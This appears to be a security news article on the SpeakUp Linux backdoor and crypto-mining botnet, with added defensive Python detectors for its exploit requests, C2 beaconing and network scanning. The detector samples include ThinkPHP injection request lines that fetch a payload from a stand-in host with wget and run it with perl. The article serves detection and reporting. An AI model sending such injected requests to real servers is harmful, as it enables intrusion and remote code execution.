LAS VEGAS. A backdoor Trojan dubbed SpeakUp has been discovered exploiting Linux servers, which run more than 90 percent of the top one million domains in the United States. It uses a sophisticated bag of tricks to infect hosts and propagate, which, analysts say, may indicate that it is being readied for a much larger attack involving a vast number of infected hosts, potentially worldwide.
According to Check Point research presented at CPX360 in Las Vegas, SpeakUp (named after its command-and-control domain, SpeakUpOmaha[dot]com) is being used in a crypto-mining campaign that is gaining momentum and has targeted more than 70,000 servers around the world, a base that could grow into a very formidable botnet.
SpeakUp targets on-premises servers as well as cloud machines, such as Amazon Web Services hosts; and it does not stop at Linux: it can also infect macOS devices.
Oded Vanunu, Head of Product Vulnerability Research at Check Point, said the attack targets all servers running ThinkPHP, Hadoop YARN, Oracle WebLogic, Apache ActiveMQ and Red Hat JBoss. And since this software can be deployed on virtual servers, he said, all cloud infrastructures are vulnerable as well.
The Trojan itself can infect any Linux distribution as well as macOS.
Infection routine
The initial infection vector targets the recently disclosed RCE vulnerability in ThinkPHP (CVE-2018-20062); the code uses command injection to upload a PHP shell, which in turn serves and executes a Perl backdoor.
The procedure is fairly convoluted. The exploit code is sent to the target server in a GET request. The uploaded PHP shell then sends a second HTTP request to the target server, with a standard injection function that fetches the ibus payload and stores it. A further HTTP request triggers execution of the payload: this runs the Perl script, sleeps for two seconds, and deletes the file to remove traces of the infection.
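The staged chain described above leaves a recognisable trail in the web server's access log: the exploit request carries the ThinkPHP route injection, and the follow-up requests carry the shell commands that fetch and then run the payload. The detector below is an added example, not code from the article or from Check Point. It parses combined-format access-log lines and flags requests that combine the `invokefunction` route marker with a PHP call-through such as `call_user_func_array` or `system`; that request shape is taken from public write-ups of CVE-2018-20062 and is this example's assumption, as are the constructed log lines, the `example.invalid` host and the `/tmp/ibus` path.

```python
import re
from urllib.parse import parse_qs, unquote

# Combined-format access log: client, ident, user, [time], "METHOD target proto", status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

# Request shape of the public ThinkPHP 5.x exploit for CVE-2018-20062: the
# route parameter "s" resolves to think\app::invokefunction and "function"
# names a PHP call-through whose arguments arrive in vars[]. These markers are
# this example's assumption, drawn from public write-ups, not from the report.
ROUTE_MARKER = "invokefunction"
DANGEROUS_FUNCS = {"call_user_func_array", "call_user_func", "system",
                   "shell_exec", "passthru", "exec", "popen"}

# Constructed sample log lines; the first two mimic the staged chain described
# above (fetch a payload, then execute it), the rest are ordinary traffic.
SAMPLE_LOG = r"""
10.0.0.5 - - [04/Feb/2019:10:12:01 +0000] "GET /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=wget%20http%3A%2F%2Fexample.invalid%2Fibus%20-O%20%2Ftmp%2Fibus HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [04/Feb/2019:10:12:03 +0000] "GET /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=perl%20%2Ftmp%2Fibus HTTP/1.1" 200 128 "-" "Mozilla/5.0"
198.51.100.7 - - [04/Feb/2019:10:13:44 +0000] "GET /index.php?s=/index/user/login HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.9 - - [04/Feb/2019:10:14:02 +0000] "GET /static/app.js HTTP/1.1" 304 0 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Split one access-log line into its fields, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    src, ts, method, target, status = m.groups()
    return {"src": src, "time": ts, "method": method, "target": target, "status": int(status)}


def inspect_request(target):
    """Return (indicators, command) for a request target; ([], None) when nothing suspicious."""
    indicators = []
    if ROUTE_MARKER in unquote(target).lower():
        indicators.append("thinkphp-invokefunction-route")
    query = target.partition("?")[2]
    params = parse_qs(query, keep_blank_values=True)  # parse_qs percent-decodes the values
    for value in params.get("function", []):
        if value.lower() in DANGEROUS_FUNCS:
            indicators.append(f"function={value}")
    for key, values in params.items():
        if key.startswith("vars") and any(v.lower() in DANGEROUS_FUNCS for v in values):
            indicators.append(f"{key}={values[0]}")
    # Reassemble the injected shell command from the vars[1][] arguments, if any.
    command_parts = [v for k, vals in params.items() if k.startswith("vars[1]") for v in vals]
    command = " ".join(command_parts) or None
    return indicators, command


def scan_log(text):
    """Return the parsed records whose request carries both the route marker and a call-through."""
    hits = []
    for raw in text.strip().splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        indicators, command = inspect_request(rec["target"])
        if "thinkphp-invokefunction-route" in indicators and len(indicators) > 1:
            rec.update(indicators=indicators, command=command)
            hits.append(rec)
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["time"], hit["src"], hit["indicators"], "->", hit["command"])
```

Requiring both the route marker and a dangerous function name keeps ordinary ThinkPHP routes (such as the login request in the sample) out of the results, and reassembling the `vars[1][]` arguments gives the responder the exact command the attacker ran, which is what distinguishes a probe from the two-step fetch-and-execute described above.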
After the victim machine registers with the C2, Check Point analysts found, SpeakUp continually asks for new tasks at a fixed interval of every three seconds. The C2 can reply “no task”, or it can instruct the bot to execute arbitrary code on the local machine, download and execute a file from any remote server, kill or uninstall the program, or send updated data.
“The beauty is that the threat resides on every infected server,” Vanunu said. “This means it can adapt to future vulnerabilities and deploy new code that will attempt to use new techniques. If the threat actor decides to add several more infection methods, the number of bots can easily grow.”
The campaign can also be scaled up instantly, since the threat actor can push malware to all infected hosts at the same time.
“Infected hosts check for new commands on the C2 server every three minutes,” Vanunu said.
“The threat actor [may also be able to] sell infected hosts to any other threat actor and deploy any type of malware for the highest price,” he added.
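A bot that polls its C2 on a fixed interval, whether every three seconds or every three minutes, produces outbound requests with almost no variance in their spacing, which is something a person or a browser never does. The script below is an added example, not code from the article or from Check Point: it groups outbound proxy records by source and destination, measures the gaps between requests, and flags pairs whose gaps are both numerous and nearly constant. The proxy records, the `example.invalid` hostnames and the thresholds are constructed assumptions for the example.

```python
from collections import defaultdict
from datetime import datetime
from statistics import median, pstdev

# Constructed outbound proxy records, "timestamp src dst", not from the article.
# 10.0.0.5 polls one host every 3 s like the bot described above; 10.0.0.8 is
# a person browsing a package mirror at irregular intervals.
SAMPLE_PROXY = """
2019-02-04T10:15:00 10.0.0.5 c2.example.invalid
2019-02-04T10:15:03 10.0.0.5 c2.example.invalid
2019-02-04T10:15:06 10.0.0.5 c2.example.invalid
2019-02-04T10:15:09 10.0.0.5 c2.example.invalid
2019-02-04T10:15:12 10.0.0.5 c2.example.invalid
2019-02-04T10:15:15 10.0.0.5 c2.example.invalid
2019-02-04T10:15:01 10.0.0.8 mirror.example.invalid
2019-02-04T10:15:19 10.0.0.8 mirror.example.invalid
2019-02-04T10:15:22 10.0.0.8 mirror.example.invalid
2019-02-04T10:16:40 10.0.0.8 mirror.example.invalid
2019-02-04T10:17:03 10.0.0.8 mirror.example.invalid
2019-02-04T10:18:30 10.0.0.8 mirror.example.invalid
"""


def load_records(text):
    """Group request timestamps by (src, dst) pair."""
    pairs = defaultdict(list)
    for line in text.strip().splitlines():
        ts, src, dst = line.split()
        pairs[(src, dst)].append(datetime.fromisoformat(ts))
    return pairs


def beacon_score(timestamps):
    """Return (median_gap_seconds, jitter_ratio) for a series, or None if too short.

    jitter_ratio is the population standard deviation of the gaps divided by
    their median: 0.0 for a perfectly regular poll, large for human traffic.
    """
    ts = sorted(timestamps)
    gaps = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
    if len(gaps) < 2:
        return None
    med = median(gaps)
    if med <= 0:
        return None
    return med, pstdev(gaps) / med


def find_beacons(pairs, min_requests=5, max_jitter=0.15):
    """Flag (src, dst) pairs with enough requests and a near-constant interval.

    The thresholds are this example's assumptions; tune them to the traffic
    you see, and remember that a bot can randomise its sleep to defeat them.
    """
    findings = []
    for (src, dst), times in pairs.items():
        if len(times) < min_requests:
            continue
        score = beacon_score(times)
        if score is None:
            continue
        med, jitter = score
        if jitter <= max_jitter:
            findings.append({"src": src, "dst": dst, "interval_s": med,
                             "jitter": round(jitter, 3), "requests": len(times)})
    return findings


if __name__ == "__main__":
    for f in find_beacons(load_records(SAMPLE_PROXY)):
        print(f"{f['src']} -> {f['dst']}: every {f['interval_s']:.0f}s, "
              f"jitter {f['jitter']}, {f['requests']} requests")
```

Dividing the standard deviation by the median makes the score independent of the polling period, so the same threshold catches a three-second poll and a three-minute one. The sample's human browsing session has a jitter ratio well above 1.0 and is ignored, while the constant poll scores exactly 0.0.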
Sophisticated propagation
SpeakUp also ships with a handy propagation script written in Python. Its main functions are brute-forcing administrative panels with a predefined list of usernames and passwords, and scanning the network environment of the infected machine. For the latter, it checks for specific ports on servers that share the same internal and external subnet. The idea is to scan for, and infect, more vulnerable Linux servers on the internal and external subnets using a full set of exploits.
For propagation, SpeakUp's code exploits known vulnerabilities in widely deployed Linux server software, including a JBoss Enterprise Application Platform security-bypass vulnerability (CVE-2012-0874); a JBoss Seam Framework remote code execution (RCE) flaw (CVE-2010-1871); a JBoss AS 3/4/5/6 RCE exploit; the Oracle WebLogic wls-wsat component deserialization RCE (CVE-2017-10271); a vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (CVE-2018-2894); a Hadoop YARN ResourceManager command-execution exploit; and the RCE file-upload vulnerability in the Apache ActiveMQ Fileserver (CVE-2016-3088).
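A host that suddenly probes many neighbours on the management ports of the middleware listed above is behaving like the propagation script described here, and that fan-out is visible in firewall or flow logs even when the exploits themselves are not inspected. The detector below is an added example, not code from the article or from Check Point. It slides a time window over each source's connections and reports the widest burst that touches several distinct hosts on middleware ports, counting how many of those targets sit in the source's own /24. The port-to-product mapping uses standard product defaults and is this example's assumption (the report does not say which ports the scanner probes), as are the constructed connection records.

```python
import ipaddress
from collections import defaultdict
from datetime import datetime, timedelta

# Default listening ports of the middleware named in the exploit list. The
# port numbers are standard product defaults assumed by this example; the
# report does not say which ports the scanner probes.
MIDDLEWARE_PORTS = {
    7001: "Oracle WebLogic",
    8080: "JBoss / ActiveMQ web",
    8088: "Hadoop YARN ResourceManager",
    8161: "ActiveMQ admin console",
}

# Constructed connection records, "timestamp src dst dport action", not from
# the article. 10.0.0.5 sweeps its own /24 for middleware ports in a few
# seconds; 10.0.0.8 makes two ordinary connections.
SAMPLE_CONN = """
2019-02-04T11:00:00 10.0.0.5 10.0.0.10 7001 rejected
2019-02-04T11:00:00 10.0.0.5 10.0.0.10 8088 rejected
2019-02-04T11:00:01 10.0.0.5 10.0.0.11 7001 rejected
2019-02-04T11:00:01 10.0.0.5 10.0.0.11 8161 rejected
2019-02-04T11:00:02 10.0.0.5 10.0.0.12 7001 accepted
2019-02-04T11:00:03 10.0.0.5 10.0.0.13 8088 rejected
2019-02-04T11:00:04 10.0.0.5 10.0.0.14 8161 rejected
2019-02-04T11:00:05 10.0.0.5 10.0.0.15 7001 rejected
2019-02-04T11:00:02 10.0.0.8 10.0.0.12 7001 accepted
2019-02-04T11:03:10 10.0.0.8 10.0.0.20 443 accepted
"""


def load_conns(text):
    """Parse the constructed connection records into dicts with a datetime and an int port."""
    conns = []
    for line in text.strip().splitlines():
        ts, src, dst, dport, action = line.split()
        conns.append({"time": datetime.fromisoformat(ts), "src": src, "dst": dst,
                      "dport": int(dport), "action": action})
    return conns


def detect_fanout(conns, window=timedelta(seconds=60), min_hosts=5):
    """Flag sources that touch many distinct hosts on middleware ports within one window.

    For each source, slide a time window over its connections and keep the
    widest burst; also count how many targets sit in the source's own /24,
    which is where the scanner described above looks first.
    """
    by_src = defaultdict(list)
    for c in conns:
        by_src[c["src"]].append(c)
    findings = []
    for src, events in by_src.items():
        events.sort(key=lambda e: e["time"])
        src_net = ipaddress.ip_network(f"{src}/24", strict=False)
        best, start = None, 0
        for end in range(len(events)):
            while events[end]["time"] - events[start]["time"] > window:
                start += 1
            burst = events[start:end + 1]
            hosts = {e["dst"] for e in burst}
            ports = {e["dport"] for e in burst} & set(MIDDLEWARE_PORTS)
            if len(hosts) >= min_hosts and ports and (best is None or len(hosts) > best["hosts"]):
                best = {
                    "src": src,
                    "hosts": len(hosts),
                    "same_subnet": sum(ipaddress.ip_address(h) in src_net for h in hosts),
                    "services": sorted(MIDDLEWARE_PORTS[p] for p in ports),
                    "first": burst[0]["time"].isoformat(),
                    "last": burst[-1]["time"].isoformat(),
                }
        if best:
            findings.append(best)
    return findings


if __name__ == "__main__":
    for f in detect_fanout(load_conns(SAMPLE_CONN)):
        print(f"{f['src']} probed {f['hosts']} hosts ({f['same_subnet']} in its /24) "
              f"for {', '.join(f['services'])} between {f['first']} and {f['last']}")
```

Rejected connections count as much as accepted ones here, because a scanner learns from both; a single accepted connection to a WebLogic port, like the one from 10.0.0.8 in the sample, is not a finding on its own. Feeding the script the source addresses flagged by the access-log or beaconing checks narrows it to hosts already suspected of infection.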
“Successful exploitation of one of the vulnerabilities results in deploying the original ibus script on the targeted server,” the Check Point analysis said, adding that the malware is also capable of infecting Mac machines.
Is there a bigger threat after infection?
For now, the files the backdoor has been observed downloading are simple Monero-mining scripts. But SpeakUp's authors can push any code they like to the servers, and Check Point analysts argue that the mining code could be a kind of beta test ahead of far more serious malware.
“SpeakUp is currently serving XMRig miners to its listening infected servers,” the research said. According to XMRHunter, the associated wallets currently hold about 107 Monero coins.
“SpeakUp's intricate payload and propagation technique is, without a doubt, the work of a bigger threat in the making,” the analysis said. “It is hard to imagine anyone building such a complex array of payloads to deploy multiple miners. The threat actor behind this campaign can at any time deploy additional payloads that are potentially more intrusive and offensive. It has the ability to scan the surrounding network of the infected server and distribute the malware.”
SpeakUp has no detections in VirusTotal.
The first victims were in East Asia and Latin America, but the researchers believe Russia and Ukraine could also become targets, as could the whole of Europe. Given the impressive propagation tactics, the non-existent detection in VirusTotal and the fact that the attack surface includes the servers behind the most popular sites on the Internet, SpeakUp could become a very serious problem, the researchers say: “This campaign, while still relatively new, can evolve into something bigger and potentially more harmful…”
Attribution
Although the exact identity of the threat actor behind this new attack has not yet been confirmed, it is clearly someone, or a group, with considerable malware experience.
“Although at present we have only found a cryptocurrency-mining payload, the most notable aspect is the propagation capability demonstrated in the code,” Vanunu said. “Not only was it highly convoluted, the variety of exploits used could potentially mean that a highly skilled hacker is behind it.”
Check Point researchers were able to link SpeakUp's author to a possibly Russian-speaking malware developer going by the name Zettabit.
“Although SpeakUp is implemented differently [from other Zettabit code], it has a lot in common with Zettabit's craftsmanship,” the analysis says.
As for what ties Zettabit to this malware, “we read all his posts on Hack Forums and his GitHub projects, so this avatar definitely knows his way around botnets,” Vanunu told Threatpost. “He even released free sample botnet code for everyone. And during the research we identified two unique strings that Zettabit himself has mentioned and used a couple of times in the past.”